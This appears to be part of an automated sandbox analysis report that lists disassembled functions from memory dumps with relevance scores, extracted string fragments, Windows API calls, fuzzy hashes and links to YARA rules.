Opcode Fuzzy Hash: ccf372d09bc0778175b6081f50476668050fb595c593df019c774ccafc5d06fe
Instruction Fuzzy Hash: 5FA14EB15083429FD368DFA5C58981BFBE0FBC9748F40891EF29696260D3B59A49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 013F4E8A, Relevance: 5.2, Strings: 4, Instructions: 193COMMON

Download Yara Rule

Strings

I/P, xrefs: 013F5067
"u, xrefs: 013F4F32
Q, xrefs: 013F5012
p(F, xrefs: 013F5032

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: "u$I/P$Q$p(F
API String ID: 0-2506779150
Opcode ID: 96453a788d16d11bbbd0aeca10db343588cf25309b1835075d43f0dc0f50ef5f
Instruction ID: e38e2e645bdc0289d1fb449c6c0037e071e19627effb85f8e1f341b10bb92251
Opcode Fuzzy Hash: 96453a788d16d11bbbd0aeca10db343588cf25309b1835075d43f0dc0f50ef5f
Instruction Fuzzy Hash: E0916272108345AFC358CF69C48941BBBF1FF94758F104A2DFA8A96620D7B18949CF83

Uniqueness

Uniqueness Score: -1.00%

Function 013E2654, Relevance: 5.2, Strings: 4, Instructions: 178COMMON

Download Yara Rule

Strings

bZ, xrefs: 013E26CA
eQL, xrefs: 013E27CF
bZ, xrefs: 013E2787
{t, xrefs: 013E28A7

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: bZ$bZ$eQL${t
API String ID: 0-1136884693
Opcode ID: 2d85644dec34de5d1bfc86371dbea229b0c923422b2c33d3c32ee82e005fc344
Instruction ID: d331040922e81809927f0d826f7e3703f807f082435bcce1836b515cac82b034
Opcode Fuzzy Hash: 2d85644dec34de5d1bfc86371dbea229b0c923422b2c33d3c32ee82e005fc344
Instruction Fuzzy Hash: 7F8120B15083819BC358CF65C98981BFBF4FBD4798F405A1DF686962A0D7B6CA09CB43

Uniqueness

Uniqueness Score: -1.00%

Function 013EA048, Relevance: 5.2, Strings: 4, Instructions: 151COMMON

Download Yara Rule

Strings

!}, xrefs: 013EA091
JML, xrefs: 013EA1AC
;*B, xrefs: 013EA17B
-C, xrefs: 013EA0F7

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: -C$JML$!}$;*B
API String ID: 0-1677314592
Opcode ID: 198ea712632aff82d2ba7eaf000112b28e07321ce321202ec5e263ac8c50f6d7
Instruction ID: 2dc80414bb152bdd2c94b076fac1d3f05deb49cbe0cf34caee69a306a8a62702
Opcode Fuzzy Hash: 198ea712632aff82d2ba7eaf000112b28e07321ce321202ec5e263ac8c50f6d7
Instruction Fuzzy Hash: DC6166B1108351AFC358CF66C98981FBEE5FBC9358F40590DF292A62A0D772CA458F97

Uniqueness

Uniqueness Score: -1.00%

Function 013F4BAA, Relevance: 5.1, Strings: 4, Instructions: 127COMMON

Download Yara Rule

Strings

`I, xrefs: 013F4C15
B'_, xrefs: 013F4BF5
\FJ, xrefs: 013F4C7B
], xrefs: 013F4CEC

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: B'_$\FJ$`I$ ]
API String ID: 0-1497742486
Opcode ID: 7d3dff3d62e47792e884eaca6a6270ae16b30c653ecb73c9367bba81c61436c6
Instruction ID: b826b5c080e1cc638853327a8bf94f1f6d648ca2b60e6822d3656d34e3da72f8
Opcode Fuzzy Hash: 7d3dff3d62e47792e884eaca6a6270ae16b30c653ecb73c9367bba81c61436c6
Instruction Fuzzy Hash: 1E5113B1D0121DEBDF08CFA5C84A9EEFBB5FB48304F108159E125BA2A0E7B51A45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 013FA8F0, Relevance: 5.1, Strings: 4, Instructions: 122COMMON

Download Yara Rule

Strings

, xrefs: 013FAA39
Cl, xrefs: 013FAA1D
r~, xrefs: 013FA9B1
, xrefs: 013FAA70

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: r~$Cl$ $
API String ID: 0-236519512
Opcode ID: 20a72a81609880c43cd855ff82a748461ad49e4f60b35bf775b900dadbd00674
Instruction ID: f810c14b65c4c829757fcbdb3b0ecbf3ab98e44d10cf8139e97f3e21efd10acf
Opcode Fuzzy Hash: 20a72a81609880c43cd855ff82a748461ad49e4f60b35bf775b900dadbd00674
Instruction Fuzzy Hash: 4941B8711083028FE718CF29C58551FBBE5FBD8258F104A1EF69A972A0D7B4DA498B87

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E5B97, Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 6E4DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E4CED16,6E4FD0A0,0000000C,00000004,00000001,00000004,?,6E4B4865,00000000,00000000), ref: 6E4DA298
Part of subcall function 6E4DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E4B4865,00000000,00000000), ref: 6E4DA33C
Part of subcall function 6E4DA294: _abort.LIBCMT ref: 6E4DA342

Part of subcall function 6E4DA294: _free.LIBCMT ref: 6E4DA2EF

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E4E5BEB
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E4E5C3C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E4E5CFC

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale$ErrorLast$_abort_free
String ID:
API String ID: 942303603-0
Opcode ID: 45418a8acfc8b0142b117e3f7673516f0d6d7d0acbd828df180ddfd2801dd4cd
Instruction ID: b57a80cc31f0a78afb7c7e028b17d07123f401ed4a193be0d5c3a1ad6a2f1186
Opcode Fuzzy Hash: 45418a8acfc8b0142b117e3f7673516f0d6d7d0acbd828df180ddfd2801dd4cd
Instruction Fuzzy Hash: FC61F1719142079FEB588FB4CC96FAA77B8EF01316F1084ABD915C6A84FB78D941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E4CED41, Relevance: 4.6, APIs: 3, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,000000FF), ref: 6E4CEE39
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,000000FF), ref: 6E4CEE43
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,000000FF), ref: 6E4CEE50

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 67d49726ec0fe1dfc536cd951fd70bc831ce472fc4e3ea8b9939a7ca9a07ebf2
Instruction ID: 20e834b8ceec521ddf5588835dd90f2b7b90050791062ed9f771bf91ecb53a14
Opcode Fuzzy Hash: 67d49726ec0fe1dfc536cd951fd70bc831ce472fc4e3ea8b9939a7ca9a07ebf2
Instruction Fuzzy Hash: E231D17590122CEBCB61DF64D889BDCBBB8BF08714F5045EAE81CA7250EB309B858F45

Uniqueness

Uniqueness Score: -1.00%

Function 6E4D69AA, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(6E4D69A9,?,6E4D69A9,00000000), ref: 6E4D69CC
TerminateProcess.KERNEL32(00000000,?,6E4D69A9,00000000), ref: 6E4D69D3
ExitProcess.KERNEL32 ref: 6E4D69E5

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: c17b3dcf41e0aa4b2b97afda252a8563b5e04dd0bb9e16b88034a5650926d48e
Instruction ID: 68c7874d9f2584aa16cbb8d3887fb0cc797616cdc79d6df513f2732ca150e189
Opcode Fuzzy Hash: c17b3dcf41e0aa4b2b97afda252a8563b5e04dd0bb9e16b88034a5650926d48e
Instruction Fuzzy Hash: C4E08C31020618EFCF217FF4D928E883B29FB013A1B00486AF9068A231CB35E841DB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C846D, Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,6E4C85D2,00000000,?,?,6E4C30BC,?,49F8414E,00000000,00000000,6E4E98D0,000000FF), ref: 6E4C8485
HeapFree.KERNEL32(00000000,?,6E4C85D2,00000000,?,?,6E4C30BC,?,49F8414E,00000000,00000000,6E4E98D0,000000FF), ref: 6E4C848C
InterlockedPushEntrySList.KERNEL32(00000000,?,?,6E4C85D2,00000000,?,?,6E4C30BC,?,49F8414E,00000000,00000000,6E4E98D0,000000FF), ref: 6E4C8495

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$EntryFreeInterlockedListProcessPush
String ID:
API String ID: 1982578398-0
Opcode ID: 3c4ff18204dbfd0eeb2ff5d6ece1518a5c01e2398c83ac06f772b3afe50b2d83
Instruction ID: 557e85b6792874e2773c431dfd3134f5ba2d32963ba54880d14aa7cde6fded1c
Opcode Fuzzy Hash: 3c4ff18204dbfd0eeb2ff5d6ece1518a5c01e2398c83ac06f772b3afe50b2d83
Instruction Fuzzy Hash: C6D05E31110709ABCF60AFF5E84CF6A776CBB09A62F04040DF20E83145DB21F4008621

Uniqueness

Uniqueness Score: -1.00%

Function 013E3845, Relevance: 4.0, Strings: 3, Instructions: 235COMMON

Download Yara Rule

Strings

o:Ha, xrefs: 013E39EC
b, xrefs: 013E3A3C
u"2`, xrefs: 013E3918

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: b$o:Ha$u"2`
API String ID: 0-822269544
Opcode ID: 6c1ba9d5cf1ea271543cc1537c0d19884156ab89ca1e1b8b1d691d83790047fc
Instruction ID: 502edd555eb9a86d7de214379f48ff1a6508ced6245aa00da7f78ce431616613
Opcode Fuzzy Hash: 6c1ba9d5cf1ea271543cc1537c0d19884156ab89ca1e1b8b1d691d83790047fc
Instruction Fuzzy Hash: 8CB121729083519FD758CF2AC58991BBBE1FBC4718F10892DF59AA7260D3B1D948CF82

Uniqueness

Uniqueness Score: -1.00%

Function 013EC158, Relevance: 4.0, Strings: 3, Instructions: 230COMMON

Download Yara Rule

Strings

8\4, xrefs: 013EC30D
6Q0, xrefs: 013EC448
%, xrefs: 013EC38F

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: %$6Q0$8\4
API String ID: 0-3431016190
Opcode ID: 80cb7e5337d19e95d48cea719c56f4688aa0481da0582cd1e9f2e05998893fa7
Instruction ID: 8da2cfa04c0a63b33efb95edfba2f9e1d44dbe91486234d67dd792762cc934c5
Opcode Fuzzy Hash: 80cb7e5337d19e95d48cea719c56f4688aa0481da0582cd1e9f2e05998893fa7
Instruction Fuzzy Hash: 64C12D724083819FD758CF25C58A90FFBF2BBC4748F009A1DF19A9A2A0D3B58949CF46

Uniqueness

Uniqueness Score: -1.00%

Function 01400B34, Relevance: 4.0, Strings: 3, Instructions: 228COMMON

Download Yara Rule

Strings

Q<, xrefs: 01400C62
w+t, xrefs: 01400CDB
lF, xrefs: 01400B86

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: lF$Q<$w+t
API String ID: 0-2786256530
Opcode ID: c5064b5ef1ab91b35e21ed4f28087d1c1029310933418871ac36a605dbda7b14
Instruction ID: 306bbf7f4b06f5520d071a052b37e7f0d433c2f5ccb5e865bb117f30e61bf3d3
Opcode Fuzzy Hash: c5064b5ef1ab91b35e21ed4f28087d1c1029310933418871ac36a605dbda7b14
Instruction Fuzzy Hash: 70A142325083409BC358CF6AD58950BFBF1FBC5758F008A2EF5A6A6260C7B5D949CF82

Uniqueness

Uniqueness Score: -1.00%

Function 013FD99A, Relevance: 4.0, Strings: 3, Instructions: 217COMMON

Download Yara Rule

Strings

*^1, xrefs: 013FD9FF
., xrefs: 013FDAB5
hIW, xrefs: 013FDA69

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: *^1$hIW$.
API String ID: 0-1727340660
Opcode ID: c384da436f0fb545a8c1791679e9a8f2dfd477be169b04fe4025f3cf74875aa7
Instruction ID: d5765ff4ee35b0a1e2a07e015692813ce755e7bf9fbef0154e5c01d36b8cec28
Opcode Fuzzy Hash: c384da436f0fb545a8c1791679e9a8f2dfd477be169b04fe4025f3cf74875aa7
Instruction Fuzzy Hash: 73B11DB24083819BC769DF65C58A80BFBF1BBC4358F508A1CF69696260D7B19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 013E4C00, Relevance: 4.0, Strings: 3, Instructions: 213COMMON

Download Yara Rule

Strings

%%, xrefs: 013E4EB9
' XL, xrefs: 013E4D3F
hVJ?, xrefs: 013E4DC0

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: %%$' XL$hVJ?
API String ID: 0-594445531
Opcode ID: cc164ebafec800e07fb1784e958b8f6e2b31a23c42e60cd4d6e39d7f3d833cc0
Instruction ID: e14992501689c11d47962b6dc9a675177b66f8ae7f8dd07d448f7b1b29cf934e
Opcode Fuzzy Hash: cc164ebafec800e07fb1784e958b8f6e2b31a23c42e60cd4d6e39d7f3d833cc0
Instruction Fuzzy Hash: 1DB10E72D0021DEBDF18CFE5D98A8DEBBB2FB18308F208159E511BA264D7B54A59CF50

Uniqueness

Uniqueness Score: -1.00%

Function 013E7283, Relevance: 3.9, Strings: 3, Instructions: 185COMMON

Download Yara Rule

Strings

'Z, xrefs: 013E7340
Sw, xrefs: 013E73B5
SQe, xrefs: 013E72E4

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: 'Z$SQe$Sw
API String ID: 0-1092675647
Opcode ID: 1418f5f717259985385e6b55493a1f36257aa7aad8db3dd7d362269924353fa2
Instruction ID: ae8e79c2ac4a73dcc7d4e688d56a3297b5520dcd673d179e3647b12c7b9a64f8
Opcode Fuzzy Hash: 1418f5f717259985385e6b55493a1f36257aa7aad8db3dd7d362269924353fa2
Instruction Fuzzy Hash: 92815371509342DFD364CF25C88991BBBE2FBC8708F40991DF68A962A0D771DA098F83

Uniqueness

Uniqueness Score: -1.00%

Function 013F5220, Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

\-", xrefs: 013F5265
v, xrefs: 013F529D
ux, xrefs: 013F5336

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: \-"$ux$v
API String ID: 0-1502591833
Opcode ID: 515e4b5e82afd43d06ff56dda77be3a4554855fda539985cfcae5346a64215fb
Instruction ID: 6ce69c8b24a942f1f9b72606865ad460e982c05ee136a1ed38eeb2b93d9cc381
Opcode Fuzzy Hash: 515e4b5e82afd43d06ff56dda77be3a4554855fda539985cfcae5346a64215fb
Instruction Fuzzy Hash: 647194711083429FC769CF28D58891FBBE1BBC4B18F504A1DF296A6220C7B5CA4ACF57

Uniqueness

Uniqueness Score: -1.00%

Function 013E3C91, Relevance: 3.9, Strings: 3, Instructions: 155COMMON

Download Yara Rule

Strings

u, xrefs: 013E3CC5
8@y, xrefs: 013E3DF2
g3, xrefs: 013E3DCF

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID: lstrcmpi
String ID: 8@y$g3$u
API String ID: 1586166983-1270726168
Opcode ID: fb6d6ef1a52e57c880d5b7ff996cbbc3f7908be38ad01abff7fa2d354f881544
Instruction ID: a3a1c2397b8d4b06450d0d71632aaa6cc437b99808930a986fed4081f0549fb3
Opcode Fuzzy Hash: fb6d6ef1a52e57c880d5b7ff996cbbc3f7908be38ad01abff7fa2d354f881544
Instruction Fuzzy Hash: 2381FC71C0121AEBCF59CFE5D98A8DEBFB1FB48308F208149D512B6260D3B45A4ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 013E30F6, Relevance: 3.9, Strings: 3, Instructions: 133COMMON

Download Yara Rule

Strings

f!, xrefs: 013E319D
i, xrefs: 013E3215
`D, xrefs: 013E3200

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: `D$f!$i
API String ID: 0-2383949327
Opcode ID: c290d9434647840f2cd4d3e7b48adf2a8bd86b0635c2f0c79ed86f25a0de9738
Instruction ID: c98b44104f5680946585267bcfaf214bf295b10daaa11612cccf4ed3f3a3f620
Opcode Fuzzy Hash: c290d9434647840f2cd4d3e7b48adf2a8bd86b0635c2f0c79ed86f25a0de9738
Instruction Fuzzy Hash: B751A9715083528BD728CF24D48992FBBE4FBC4718F004A1DF6D6972A0DB748A09CB97

Uniqueness

Uniqueness Score: -1.00%

Function 013FAC9B, Relevance: 3.9, Strings: 3, Instructions: 128COMMON

Download Yara Rule

Strings

fK, xrefs: 013FAD37
h9(, xrefs: 013FADCE
RT{, xrefs: 013FACF5

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: RT{$fK$h9(
API String ID: 0-2003623628
Opcode ID: 3bbba2050a31e3ee8d457072deb25ac2bf6fc11427baae84316959df3431de42
Instruction ID: 8e68eb867f3bb62989803b61bcd739a65ac801fb60e5ed7d37c1a7c26a207452
Opcode Fuzzy Hash: 3bbba2050a31e3ee8d457072deb25ac2bf6fc11427baae84316959df3431de42
Instruction Fuzzy Hash: 995145B15083469FC748DF65C48986BBBE5FBD8348F405A0DF69A92220D3B4CA598F87

Uniqueness

Uniqueness Score: -1.00%

Function 013FAEEB, Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

G&7, xrefs: 013FAFEA
>m , xrefs: 013FB014
qP, xrefs: 013FAF78

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: >m $G&7$qP
API String ID: 0-395818401
Opcode ID: cf6bfd9fcb02bda12f26cc508639df090f3ff35530408397f4c0b22724cb0983
Instruction ID: 4235cadaffdaa44159574eb1e8ecdf1c7175d3f2a7138c3c4b5887538623f4ab
Opcode Fuzzy Hash: cf6bfd9fcb02bda12f26cc508639df090f3ff35530408397f4c0b22724cb0983
Instruction Fuzzy Hash: 22510272D01219ABDF08CFE1D98A8EEBBB2FF08314F208159E515BA260D7B54A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 013FFD10, Relevance: 3.9, Strings: 3, Instructions: 105COMMON

Download Yara Rule

Strings

nh7, xrefs: 013FFDFD
Kt, xrefs: 013FFD90
'j, xrefs: 013FFE0E

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: 'j$Kt$nh7
API String ID: 0-250860472
Opcode ID: 9e153df995d8ae70903d7feeff111af939ef16e7bdc3e7458fca5a87fe2199cb
Instruction ID: 7442a44a987930b436f14d1f584cb3ef48ba0e5103333d4574a33ce1f55660b1
Opcode Fuzzy Hash: 9e153df995d8ae70903d7feeff111af939ef16e7bdc3e7458fca5a87fe2199cb
Instruction Fuzzy Hash: 25413072D0020EABDB08CFA1C94AAEEBFB2FF44718F208059D511B6250D7B96A05CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DD1EE, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 6E4DD39F

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 14a5fce217571b9ca24d1f0ff0933e2f2b0faff10061f00074bfcda7ce3a5d34
Instruction ID: 700f2b5dfc3b2c3c2e3e9e017515916b700a29dda9e17305e16322532efad504
Opcode Fuzzy Hash: 14a5fce217571b9ca24d1f0ff0933e2f2b0faff10061f00074bfcda7ce3a5d34
Instruction Fuzzy Hash: 1631F8729041496FCB148EB9CC94EEB7BBDDB86314F00069EE91997355E630DD49CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DE2F8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,?,?,?,6E4DB7B9,?,20001004,?,00000002,?), ref: 6E4DE337

Strings

;\Ln, xrefs: 6E4DE322

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ;\Ln
API String ID: 2299586839-2500737854
Opcode ID: 26795151a847d955452fdb9ce679336e1b68f9a7f2e6dc70077eb87358e0ac06
Instruction ID: aa64ae4c9dd0ae3155fe1ce83eec02dab822e3ed88fe3aae15e9b3f1336fac96
Opcode Fuzzy Hash: 26795151a847d955452fdb9ce679336e1b68f9a7f2e6dc70077eb87358e0ac06
Instruction Fuzzy Hash: 31F0E230901608BBCF02AFB0DC14DAEBBA9EF09710F00451AFC0167211CB329E259AC4

Uniqueness

Uniqueness Score: -1.00%

Function 013FE441, Relevance: 2.7, Strings: 2, Instructions: 234COMMON

Download Yara Rule

Strings

x+, xrefs: 013FE4EF
Xt;, xrefs: 013FE4DF

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: Xt;$x+
API String ID: 0-279117347
Opcode ID: a0ae3962c8c17e109f7354182bb2aaef5c7039709eddecec457afe7247061f19
Instruction ID: 850956e831cb49863096e3781108960d01bf234cdf22d2eb53537d95f1630125
Opcode Fuzzy Hash: a0ae3962c8c17e109f7354182bb2aaef5c7039709eddecec457afe7247061f19
Instruction Fuzzy Hash: AFA162729083809FD358DF69C48A40BFBF1BBC4758F158A2DF69A96220D7B5D9098F43

Uniqueness

Uniqueness Score: -1.00%

Function 013E9A57, Relevance: 2.7, Strings: 2, Instructions: 193COMMON

Download Yara Rule

Strings

%, xrefs: 013E9B25
{?,, xrefs: 013E9D01, 013E9D05

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: %${?,
API String ID: 0-1801079363
Opcode ID: d861f13cdc920020bc8ff5e3920b5415e722e2189437e95666f529ffa51a7e37
Instruction ID: a871110bfa07f21d26d04ea747232a9c4038ab54ab251a893cf9271c674a885e
Opcode Fuzzy Hash: d861f13cdc920020bc8ff5e3920b5415e722e2189437e95666f529ffa51a7e37
Instruction Fuzzy Hash: CE9120720083419FD759CF66C98990BBBF1FBC8748F004A1DF6A696260C3B2CA59CF42

Uniqueness

Uniqueness Score: -1.00%

Function 013E3502, Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

Strings

5, xrefs: 013E3729
*^, xrefs: 013E350A

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: *^$5
API String ID: 0-1426932712
Opcode ID: 961cffbfb1eb8595fceb9121a9cdcf81813aeaa0a357ffb4d8d1bd3f182eef0e
Instruction ID: d167e1b982d9127b5154c96dd58bc4334ce53107ddea67f0b220916d341b7c41
Opcode Fuzzy Hash: 961cffbfb1eb8595fceb9121a9cdcf81813aeaa0a357ffb4d8d1bd3f182eef0e
Instruction Fuzzy Hash: AC8132B1808381ABC348DF2AC98940BFFF1BBD4758F405A1DF59696260D3B1DA49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 013E1A0A, Relevance: 2.7, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

_M , xrefs: 013E1B13
+EJ, xrefs: 013E1AB4

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: +EJ$_M
API String ID: 0-3555891106
Opcode ID: 1ae7b6387e9c8b53700d3f1f6248e7ce6af659c4c14c49b3176e5345381a2654
Instruction ID: 817f201188d3546eaaaf03a0fafc2ae2f58bed2e2794667219d6ef8b42c0d8ee
Opcode Fuzzy Hash: 1ae7b6387e9c8b53700d3f1f6248e7ce6af659c4c14c49b3176e5345381a2654
Instruction Fuzzy Hash: 9C619E75D013199BCF14DFA9C98A9EEFBB5FF84718F208059D202BA290D7B44A45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 013F98BD, Relevance: 2.7, Strings: 2, Instructions: 156COMMON

Download Yara Rule

Strings

Z!8, xrefs: 013F992E
J2, xrefs: 013F9962

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: J2$Z!8
API String ID: 0-963410357
Opcode ID: a0f36202975ff85fcae6f69b259e69c48d880b7ae1c3469607594b89595fd5a2
Instruction ID: 6ac708fd677fa9280cc5f28631835167eb11b5ae79a8de90366814a548762464
Opcode Fuzzy Hash: a0f36202975ff85fcae6f69b259e69c48d880b7ae1c3469607594b89595fd5a2
Instruction Fuzzy Hash: 1D7144B25093409FC358DF69C98991BBBF2FBC8748F409A1DF6899A260D3B5D9448F06

Uniqueness

Uniqueness Score: -1.00%

Function 014003F1, Relevance: 2.7, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

PO, xrefs: 0140058F
zr, xrefs: 014005CE

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: PO$zr
API String ID: 0-1085754687
Opcode ID: cb5f4cbd082e4a2a5b484544e97847330ac73834ca8d448b6984114d5d99bd77
Instruction ID: bacf95f7ba597f33fc5d9e4c62c7286967343b5fd2ed3b82b24320ed73d602c4
Opcode Fuzzy Hash: cb5f4cbd082e4a2a5b484544e97847330ac73834ca8d448b6984114d5d99bd77
Instruction Fuzzy Hash: E26135B1108301AFC785DF26C88991BBBE2FBC4758F40892DF59656260D3B5CA4ACF57

Uniqueness

Uniqueness Score: -1.00%

Function 013E6FC4, Relevance: 2.7, Strings: 2, Instructions: 151COMMON

Download Yara Rule

Strings

w^, xrefs: 013E703C
)w', xrefs: 013E707C

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: )w'$w^
API String ID: 0-882844667
